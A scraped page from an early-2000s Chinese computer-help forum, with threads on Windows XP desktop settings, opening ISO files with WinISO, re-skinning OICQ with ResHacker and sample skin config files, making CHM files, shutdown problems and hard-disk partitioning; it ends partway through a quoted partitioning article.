redtulip 高级用户 积分：208 发帖：106 来自： 注册：2001-12-19 | 发表于 2002-01-14 18:54:29 按此观看redtulip的个人资料 按此发邮件给redtulip redtulip 的 oicq 是7701927,查看 7701927 的资料 发送悄悄话给redtulip 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redtulip的IP 想在桌面上显示IE图标：进入显示属性，在桌面那个栏里有个自定义桌面按扭，在这里可以选择在桌面上显示什么图标。 多谢，多谢！
风梦扬 超级用户 积分：331 发帖：125 来自：广州 注册：2000-10-21 | 发表于 2002-01-14 19:30:09 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP QQ问题么...只需要在 "桌面属性 -- 外观 -- 效果" 下 不要勾选 "拖动时显示窗口内容" 即可. 还有在 "控制面板 -- 系统 -- 系统属性 -- 高级" 性能下的设置 -- 视觉效果 下,不要勾选"拖动时显示窗口内容". 华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质. 想和NJ们互动么?也欢迎各位一起来参与我们的节目! 进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.
风梦扬 超级用户 积分：331 发帖：125 来自：广州 注册：2000-10-21 | 发表于 2002-01-14 19:34:05 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP 怎么会那么多账号? 你就在"控制面板 -- 用户帐号",把其余不用的帐户全部删除,最后选择"更改用户登陆和注销"的方式. 华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质. 想和NJ们互动么?也欢迎各位一起来参与我们的节目! 进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.
netant 终级用户 积分：587 发帖：517 来自：欠发达地区 注册：2001-05-14 | 发表于 2002-01-15 10:25:41 按此观看netant的个人资料 按此发邮件给netant 访问netant的主页 netant 的 oicq 是64188400,查看 64188400 的资料 发送悄悄话给netant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看netant的IP 问题全部解决 谢谢楼上几位,这里真是高效啊 我发现我上次用的签名档太没有个性了
上一贴 | 下一贴
快速回复 | 主题：xp下的qq
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教：ISO 文件 是什么压缩格式的？用什么文件打开：

计算机技术
请教：ISO 文件 是什么压缩格式的？用什么文件打开：

上一贴 | 下一贴
发表人 主题: 请教：ISO 文件 是什么压缩格式的？用什么文件打开：
叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-19 23:25:15 按此观看叶竟的个人资料 按此发邮件给叶竟 收藏该主题供以后查看 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
我下载了 个软件 压缩格式 是 ISO格式 如何解压缩 ：

谢谢

Imhow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-19 23:36:15 按此观看Imhow的个人资料 按此发邮件给Imhow 访问Imhow的主页 Imhow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给Imhow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Imhow的IP
是光盘镜象文件,使用WinISO软件打开.下载地址:
http://newhua.ruyi.com/down/WINISO53.EXE

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2002-01-20 02:09:48 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
我就刻成光盘再用，呵呵，不失为懒人和菜鸟的好方法

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2002-01-20 11:23:12 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
软件名称 WinISO
软件版本 5.3.0.125
软件类别 光盘工具
应用平台 WIN9X/WINNT/WIN2K
授权形式 共享
软件评级 ★★★★★
下载次数 2386
汉化作者 YY
上传日期 2001-11-19 软件介绍
WinISO 是一个 CD-ROM 映像文件格式转换工具，并且可以直接编辑光盘映像文件！
WinISO 能够运行在 Windows95/98/Me/NT/2000 环境下。它可以处理几乎所有的 CD-ROM 映像文件，包括 ISO 和 BIN。通过 WinISO，你可以在映像文件内部 添加/删除/重命名/提取 文件。 你可以将其他格式的映像文件转换为标准的 ISO 格式，同时你也可以从你的 CD-ROM 中创建 ISO 映像文件。
特点：
1. WinISO 是第一个能够直接编辑 BIN/ISO 或几乎所有格式映像文件的软件！
2. 你可以转换几乎所有的映像文件格式，包括 BIN，并且将它们保存为标准的 ISO 格式文件。
3. 它支持几乎所有已知的 CD-ROM 映像文件，包括一些虚拟光驱的映像文件。
4. 你可以从 CD-ROM 中创建一个 ISO 文件。
5. 你可以选择映像文件或目录，任何以这些文件为基础创建一个标准的ISO 映像文件。
6. 能够打开一个映像文件，显示该文件目录树，然后在映像文件内部运行文件。这便于 查看/运行 文件或安装 程序/文件。
7. 由于它的文件关联，你可以在 Windows 资源管理器中通过在 ISO 文件上直接双击打开它。
8. 操作简单的使用界面，但是它的功能却非常强大！

原版：
http://www.hanzify.org/download.asp?TYPE=YB&SOFT_ID=3583&SITE=4

汉化：
http://www.hanzify.org/download.asp?SOFT_ID=3583&SITE=4

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-20 12:23:21 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
arrive在上个帖子中说
[quote] 软件名称 WinISO
软件版本 5.3.0.125
软件类别 光盘工具
应用平台 WIN9X/WINNT/WIN2K
授权形式 共享
软件评级 ★★★★★
下载次数 2386
汉化作者 YY
上传日期 2001-11-19 软件介绍
WinISO 是一个 CD-ROM 映像文件格式转换工具，并且可以直接编辑光盘映像文件！
WinISO 能够运行在 Windows95/98/Me/NT/2000 环境下。它可以处理几乎所有的 CD-ROM 映像文件，包括 ISO 和 BIN。通过 WinISO，你可以在映像文件内部 添加/删除/重命名/提取 文件。 你可以将其他格式的映像文件转换为标准的 ISO 格式，同时你也可以从你的 CD-ROM 中创建 ISO 映像文件。
特点：
1. WinISO 是第一个能够直接编辑 BIN/ISO 或几乎所有格式映像文件的软件！
2. 你可以转换几乎所有的映像文件格式，包括 BIN，并且将它们保存为标准的 ISO 格式文件。
3. 它支持几乎所有已知的 CD-ROM 映像文件，包括一些虚拟光驱的映像文件。
4. 你可以从 CD-ROM 中创建一个 ISO 文件。
5. 你可以选择映像文件或目录，任何以这些文件为基础创建一个标准的ISO 映像文件。
6. 能够打开一个映像文件，显示该文件目录树，然后在映像文件内部运行文件。这便于 查看/运行 文件或安装 程序/文件。
7. 由于它的文件关联，你可以在 Windows 资源管理器中通过在 ISO 文件上直接双击打开它。
8. 操作简单的使用界面，但是它的功能却非常强大！

原版：
http://www.hanzify.org/download.asp?TYPE=YB&SOFT_ID=3583&SITE=4

汉化：
http://www.hanzify.org/download.asp?SOFT_ID=3583&SITE=4
[/quo

谢谢 可是我买不起原版 我只买得起D版 大哥有的话 提供 一下 上面的那个地址 好像没有

叶竟

终级用户
积分：584
发帖：162
来自：中国
注册：2001-11-19
 发表于 2002-01-20 12:32:17 按此观看叶竟的个人资料 按此发邮件给叶竟 发送悄悄话给叶竟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看叶竟的IP
叶竟在上个帖子中说
引用:
arrive在上个帖子中说
[quote] 软件名称 WinISO

谢谢 可是我买不起原版 我只买得起D版 大哥有的话 提供 一下 上面的那个地址 好像没有

我找到了 还有汉化 ～～真太好了 谢谢这位老兄

上一贴 | 下一贴
快速回复 | 主题：请教：ISO 文件 是什么压缩格式的？用什么文件打开：
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有谁知道将OICQ改头换面的软件或者别的方法？？？

计算机技术
有谁知道将OICQ改头换面的软件或者别的方法？？？

上一贴 | 下一贴
发表人 主题: 有谁知道将OICQ改头换面的软件或者别的方法？？？
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-11 15:35:38 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
谢谢！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-11 15:38:39 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
软件不清楚有没有 根据他的图片规则做就可以了~

http://cninfonet.com/bbs_new/showtopic.asp?TOPIC_ID=598&Forum_id=3&page=

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-11 19:00:18 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
http://www.5dns.com/hw/soft/

到我的网页上下载一个reshacker
是双击下载
用它打开QQ的exe文件，里面很多东西都可以替换！自己看着改吧，是中文的！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-11 21:32:12 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
;skin配置文件样本
;------------------------------------------------------------
;main段控制主面板的Skin
;主面板有三种表现形式:拉伸,平铺,组合,可以任选一种
;===========================================================================
[main]
;标题栏的拉伸图片
;title=

;标题栏的组合图片
;title_left=
;title_middle=
;title_right=

;标题栏按钮图片
titlebox=titlebox.bmp

;拉伸图片,整个面板由一张图片拉伸而成
stretch=
;平铺图片,整个面板由一张图片平铺,如图片不够大,则按从左到右,从上到下平铺
tile=
;最小宽度
minwidth=100
;最小高度
minheight=
;最大宽度
maxwidth=200
;是否画标题栏按钮
drawtitlebox=0

;组合的面板各部分,面板由这些图片组合而成
back=back.bmp
top_left=main_top_left.bmp
top_right=main_top_right.bmp
top_middle=main_top_middle.bmp

middle_left=main_middle_left.bmp
middle_right=main_middle_right.bmp

bottom_left=bottom_left.bmp
bottom_middle=main_bottom_middle.bmp
bottom_right=main_bottom_right.bmp

;--------------------------------------------------------------
;button段,控制按钮的缺省Skin
;一个按钮有三种状态:普通,激活,按下
;每种状态有三种表现形式::拉伸,自动切分,组合,可以任选一种
;================================================================================
[button]
;按伸形式的SKIN---------------------------
stretch=folder.bmp
;自动切形式的SKIN,这种方式下,图片中间10pix一段被用来平铺,剩下的两端分别放在左右两头
tile=
;组合形式的Skin
left=
middle=
right=

;激活状态下的Skin------------------------
light_stretch=
light_tile=
light_left=
light_middle=
light_right=

;按下状态的Skin--------------------------
down_stretch=
down_tile=
down_left=
down_middle=
down_right=

;是否画按钮上的图标
useicon=1
;是否画按钮上的字
usetext=1

;------------------------------------------------------------
;buttonXX段,控制特定按钮的Skin
;button1...button6为面板下部的6个按钮,buttont1...buttont3面板上部的3个按钮
;=======================================================================================
[buttont1]
stretch=t1.bmp
light_stretch=t1.bmp
[buttont2]
stretch=t1.bmp
light_stretch=t1.bmp
[buttont3]
stretch=t1.bmp
light_stretch=t1.bmp

;-------------------------------------------------
;folder段,控制OICQ面板中上下滑动的滑块的Skin
;大部分与Button段的东东样同
;===============================================================================
[folder]
stretch=folder.bmp
tile=
left=
middle=
right=

light_stretch=folder_light.tile.bmp
light_tile=
light_left=
light_middle=
light_right=

down_stretch=folder_down.tile.bmp
down_tile=
down_left=
down_middle=
down_right=

;滑块上字的颜色
color_red=255
color_green=0
color_blue=0

;---------------------------------------------
;bar段,控制Oicq面板上那些滑块所在的子面板的SKIN
;===========================================================
[bar]
;上下左右的间隙
leftspace=3
rightspace=4
topspace=6.5
bottomspace=5

;子面板背景的图片
back_tile=
back_stretch=

;子面板中字的颜色
color_red = 100
color_green=0
color_blue=0

;子面板的滚动按钮的图片
;上
scrollup=scrollbox1.bmp
;按下的上
scrollup_down=scrollbox1.bmp
;下
scrolldown=scrollbox.bmp
;按下的下
scrolldown_down=scrollbox.bmp

;------------------------------
;buttongroup段,控制主面板下部按钮与各边的间隙
;=======================================================
[buttongroup]
leftspace=2
rightspace=2
topspace=0
bottomspace=1
;-----------------------------------------
;buttongrouptop段,控制主面板上部三个小按纽与各边的间隙
;============================================================
[buttongrouptop]
topspace=5
leftspace=5
;------------------------------------
;menu段,按制主面板中菜单的颜色和logo图片
;=========================================================
[menu]
color_red=141
color_green=166
color_blue=204
;主菜单中的logo图片
logo=

这是范例，不用理会

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-11 21:33:52 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
;ChtBoy Design..http://www.21designs.com/..http://www.deskcity.com/
[main]
back=back.bmp
titlebox=titlebox.bmp
top_left=main_top_left.bmp
top_right=main_top_right.bmp
top_middle=main_top_middle.bmp
middle_left=main_middle_left.bmp
middle_right=main_middle_right.bmp
bottom_left=bottom_left.bmp
bottom_middle=main_bottom_middle.bmp
bottom_right=main_bottom_right.bmp
minwidth=100
drawtitlebox=0

[button]
tile=btn.bmp
light_tile=btnlight.bmp
down_tile=btndown.bmp

[buttont1]
tile=btn1.bmp
light_tile=btnlight1.bmp
down_tile=btndown1.bmp
[buttont2]
tile=btn1.bmp
light_tile=btnlight1.bmp
down_tile=btndown1.bmp
[buttont3]
tile=btn1.bmp
light_tile=btnlight1.bmp
down_tile=btnlight1.bmp

[buttongrouptop]
leftspace=13
topspace=6

[bar]
leftspace=2
rightspace=2
topspace=10
bottomspace=1
scrollup=scrollbox1.bmp
scrollup_down=scrollbox2.bmp
scrolldown=scrollbox.bmp
scrolldown_down=scrollbox3.bmp

[buttongroup]
leftspace=2
rightspace=2
topspace=0
bottomspace=11
useicon=1

[folder]
tile=folder.bmp
light_tile=folder_light.tile.bmp
down_tile=folder_down.tile.bmp

[menu]
color_red=211
color_green=222
color_blue=250
logo=logo.bmp

这个放在外观的文件夹里

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

天行健

高级用户
积分：184
发帖：72
来自：SKYJH
注册：2002-03-11
 发表于 2002-04-29 18:01:54 按此观看天行健的个人资料 按此发邮件给天行健 访问天行健的主页 天行健 的 oicq 是63153941,查看 63153941 的资料 发送悄悄话给天行健 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天行健的IP
http://www.5dns.com/hw/soft/
打不开

楼上的说的是什么啊

[img]http://campus.ytu.edu.cn/xcb/forum/pic/logo_2.gif[/img]
[img]http://campus.ytu.edu.cn/xcb/forum/pic/LOGO.GIF[/img]
红色论坛！
烟台大学学生论坛！
地址http://luojie.7i24.com

Hongse Web Team
[size=1]Mode

janlay

终级用户
积分：1024
发帖：265
来自：武汉
注册：2001-02-10
 发表于 2002-04-29 18:07:23 按此观看janlay的个人资料 按此发邮件给janlay 访问janlay的主页 janlay 的 oicq 是629489,查看 629489 的资料 发送悄悄话给janlay 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看janlay的IP
EXE Resource也行。

人面上难分好坏，只要它对你我没有伤害。
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-04-29 18:09:40 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
换空间了，这是很久的贴子

http://www.52nh.com/hw/soft

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

上一贴 | 下一贴
快速回复 | 主题：有谁知道将OICQ改头换面的软件或者别的方法？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问各位大虾，*.chm文件怎么制作呀？

计算机技术
请问各位大虾，*.chm文件怎么制作呀？

上一贴 | 下一贴
发表人 主题: 请问各位大虾，*.chm文件怎么制作呀？
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-20 12:48:48 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 收藏该主题供以后查看 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
信望各路神仙能不吝赐教，小猪这有礼了，呵呵

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-20 12:55:00 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
http://download.yesky.com/servlet/mydown.yeskydown?tag=4&objID=16035

Blueidea Web Team.
Moderator Of Computer Technology Forum
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-20 13:06:28 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
谢谢啦！

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
上一贴 | 下一贴
快速回复 | 主题：请问各位大虾，*.chm文件怎么制作呀？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


大虾们，小猪又有问题了，没办法呀，谁叫我菜呢！

计算机技术
大虾们，小猪又有问题了，没办法呀，谁叫我菜呢！

上一贴 | 下一贴
发表人 主题: 大虾们，小猪又有问题了，没办法呀，谁叫我菜呢！
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-20 18:14:49 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 收藏该主题供以后查看 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
我想把HTML文件做成*.CHM帮助文件，但是试了一下HTML help Workshop,我想确认一下我所要做的用这个软件合适吗？如果不合适应该换什么软件呢？

谢谢啦

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-11-20 21:06:18 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
我比较喜欢用E-PUBLISHER和FAR
使用方法都很简单，你只要有HTML或TXT文件就可以做了
做的步骤么，一般都有向导，摸着菜单慢慢做就好

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

上一贴 | 下一贴
快速回复 | 主题：大虾们，小猪又有问题了，没办法呀，谁叫我菜呢！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


不能完全关机在CMOS里怎么改

计算机技术
不能完全关机在CMOS里怎么改

上一贴 | 下一贴
发表人 | 主题: 不能完全关机在CMOS里怎么改
wangfeng 高级用户 积分：280 发帖：91 来自：辽宁 注册：2001-12-23 | 发表于 2002-01-18 21:53:40 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 收藏该主题供以后查看 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP 2000SERVER还没正常关过呢 98有时候也犯病 应该是CMOS 中电源管理的问题 请高手帮忙哦 我曾经问个不休？……？
肖天 超级用户 积分：347 发帖：90 来自：黑龙江省 注册：2001-06-28 | 发表于 2002-01-19 03:58:20 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP 别的我不知道， 98下有一个快速关机的补丁 我用的非常好用 good good study ,day day up!
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2002-01-19 17:40:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 不单是CMOS，可能的原因很多，我以前的机子就是靠改注册表搞定的。 网上关于这方面的文章很多，推荐几篇，希望能对你有所帮助： WIN98无法关机的解决方法 http://www.people.com.cn/GB/channel5/569/20000706/133257.html 为什么Win98升级到Win2000后无法自动关机 http://dichen.myrice.com/WIN2000gj.htm 解决Windows 9x不能正常关机 http://pcworld.ccw.com.cn/2001/back_issues/2104/0433e.asp Win98 Se关机补丁 http://go4.163.com/feng45/software/patch.html Blueidea Web Team. Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：不能完全关机在CMOS里怎么改
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


买了一块60G的硬盘,我该怎么规划它啊?

计算机技术
买了一块60G的硬盘,我该怎么规划它啊?

上一贴 | 下一贴
发表人 主题: 买了一块60G的硬盘,我该怎么规划它啊?
drewfly

高级用户
积分：299
发帖：166
来自：
注册：2000-02-19
 发表于 2001-11-26 12:41:29 按此观看drewfly的个人资料 按此发邮件给drewfly 收藏该主题供以后查看 发送悄悄话给drewfly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看drewfly的IP
还有一块15G的,总共75G了,haha~

加上宽带接入,大家棒我规划一下,该如何分区呢

DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-11-26 14:46:55 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
10G---->0S

10G---->TOOLS

40G---->ISO & WAREZ & BACKUP

15G的那个就不要分拉,放些 mp3 听听或当移动硬盘

木有签名#@$%
drewfly

高级用户
积分：299
发帖：166
来自：
注册：2000-02-19
 发表于 2001-11-26 15:37:04 按此观看drewfly的个人资料 按此发邮件给drewfly 发送悄悄话给drewfly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看drewfly的IP
有没有多系统分区的方案呢?
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-26 15:41:11 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
个人认为OS的区没必要分这么大，以后不好克隆

这里有一篇文章，讲得挺详细的，你可以看一下：

越大越要分清楚：硬盘分区有技巧

给硬盘划分分区，要从三个方面来考虑：

1、是按您要安装的操作系统的类型及数目来分区；

2、是各分区数据类型的分类存放；

3、是维护整理时候的便利。

一、基于操作系统方面的分区

就一般的办公、娱乐游戏用途而言，建议您一个中文windows98完全足够了。如果你要经常上网和手头有两台以上PC要连接成简单的局域网进行管理，windows2000是个很好的选择。不是专门的服务器用途的话，不建议采用NT系统，因为NT4.0及以下版本对8.4G以上的硬盘不支持，要安装大堆的补丁，普通用户装这个是自找麻烦；另外，笔者觉得windowsME是个不伦不类的操作系统，说是抛弃了DOS，其实还是基于DOS的，却又没有纯DOS的状态，给系统管理维护带来一定的不便，倒不如windows98实在。现在比较流行的是装多个操作系统并存，这里就以60G硬盘、三个操作系统并存为假设，说说如何分区及设置多少个分区较合适。

C盘，建议分区的大小是2到3G，FAT32格式，2G为好。这是考虑到C盘使用的是您最常用的操作系统所在区域，建议您先装windows98，因为windows98兼容DOS系统很好，万一出问题，可以在此基础上对各个操作系统进行恢复。2到3G的容量是考虑到你还要把一些常用的工具软件安装在C盘上比如OFFICE、WPS系列等等，和基于以后升级操作系统如装windowsXP的需要，但又不能太大，以免初始化和磁盘整理的时候耗时过长。装Windows95OSR/2（俗称windows97）也可以考虑，功能和98差不多，更短小精悍，只是图标、界面没98那么漂亮而已。

D盘，建议您和C盘划分的容量和格式一样，也是2～3G，因为这是第二个操作系统所在的分区。一般操作系统所在的分区都建议在2～3G的容量，即使是windowsXP也够了。给操作系统预留出1到2G的空间比较合适，多了浪费而且整理维护费力，少了操作系统可能会因为临时交换文件无法放置运作不正常。建议您安装windows2000，windows2000是一个很稳定成熟的系统，能自动兼容windows9X，生成多重启动菜单，免去您使用第三方工具软件管理的麻烦。

E盘，可以稍微设置大一点，3～5G之间均可。这个分区上的操作系统如果您打算装NT或是windows2000服务器版本，可以划分为NTFS，以便更好地配合这些网络专用操作系统的性能。反正是网络专用的，这个分区可以特殊一点；如果您不打算安装第三个操作系统，这个分区还是建议FAT32格式，留来做后备或装个XP、LINUX学习新知识也很好。

二、基于数据管理调用和维护方面的分区

到此，已经划分使用的分区数量假设是2+3+4G，已经有3个分区，用了9个G的容量，都是基于操作系统来考虑的；从现在开始，后面的分区就要以数据存储分类和整理维护的方便来考虑了：

我看到有的人为了磁盘整理的方便和速度，竟然将40G以上的大硬盘划分成10多个分区，甚至是26个字母都用尽进行盘符分配——26个分区，每个数百兆到数G不等，在“我的电脑”里占满了屏幕，这么多的分区需要用户很清楚地记忆自己机器的数据存放状态，对数据的集中分类管理、调用很不方便。除非您的情况真的很特殊要划分这么多个分区，否则不建议这样的做法。因为磁盘整理不是对每种数据类型、每种程序运行都有必要的，在很多谈磁盘整理的经验技巧文章里都没指出这点，好像磁盘整理永远是天经地义的，事实却并非如此。

还是继续说E盘以后的分区划分，在当中慢慢说明磁盘整理的问题。

